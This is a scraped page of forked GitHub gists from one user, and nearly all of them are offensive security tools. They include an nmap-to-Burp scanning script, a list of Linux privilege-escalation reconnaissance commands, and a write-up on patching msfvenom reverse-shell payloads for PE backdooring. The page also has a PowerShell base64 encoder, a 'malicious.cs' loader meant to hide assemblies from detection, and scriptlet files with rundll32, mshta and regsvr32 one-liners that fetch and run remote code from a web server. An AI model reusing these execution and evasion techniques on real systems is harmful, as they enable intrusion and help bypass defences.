
@jayaramyalla
jayaramyalla / nmapburp.sh
Created September 7, 2018 19:07 — forked from jgamblin/nmapburp.sh
NMap a network and send all open web servers to Burp.
#!/bin/bash
#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.
# Port must be given with -p; a bare "443" after --open would be parsed by nmap as a target.
sites=$(nmap "$1" -p 443 --open --resolve-all -oG - | awk 'NR!=1 && /open/{print $2}')
for site in $sites
do
    # Submit each host to the local Burp REST API scan endpoint.
    curl -vgw "\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1
    printf "Scanning %s with burp.\n" "$site"
done
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
    # Handler for the GET requests: reply 200 with an empty body
    def do_GET(self):
        self.send_response(200)
        self.end_headers()

# Start the server on PORT_NUMBER so the handler above is actually served
server = HTTPServer(('', PORT_NUMBER), myHandler)
server.serve_forever()
@jayaramyalla
jayaramyalla / linux_privesc
Created September 16, 2018 07:10 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
@jayaramyalla
jayaramyalla / msfvenom-reverse-tcp-WaitForSingleObject.md
Created September 18, 2018 19:21 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for the WaitForSingleObject call within a modern msfvenom-generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment and WaitForSingleObject locating & patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching on the problem of finding this particular Windows API. Since RE is one of my stronger FUs, I decided to write down my explanation of the subject.

Contents:

@jayaramyalla
jayaramyalla / remove-win-10-apps.md
Created September 18, 2018 19:23 — forked from filipesam/remove-win-10-apps.md
How to remove Windows 10 Apps (eg. "Photos")

How to remove Windows 10 Apps (eg. "Photos")

Open PowerShell (right click > Run as Administrator) and enter: Get-AppxPackage *photo* | Remove-AppxPackage. For other apps, replace "photo" with the name of the app you want to remove.

If you want to look at the list of installed applications, just use Get-AppxPackage. If you want to copy that list into a program better suited for working with text (e.g. one with search), type: Get-AppxPackage | clip

@jayaramyalla
jayaramyalla / transformFile.py
Created September 30, 2018 12:20 — forked from Arno0x/transformFile.py
Performs multiple useful transformations on files
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
#!/bin/bash
echo "Base64 encoded, ready to be used with 'powershell -e':"
echo "$1" | iconv --to-code UTF-16LE | base64 -w 0
echo
@jayaramyalla
jayaramyalla / malicious.cs
Created September 30, 2018 12:21 — forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
@jayaramyalla
jayaramyalla / scriptlet.sct
Created September 30, 2018 12:23 — forked from Arno0x/scriptlet.sct
Scriptlet that can be executed by mshta or rundll32 for arbitrary code execution
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
@jayaramyalla
jayaramyalla / regsvr32.sct
Created September 30, 2018 12:23 — forked from Arno0x/regsvr32.sct
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[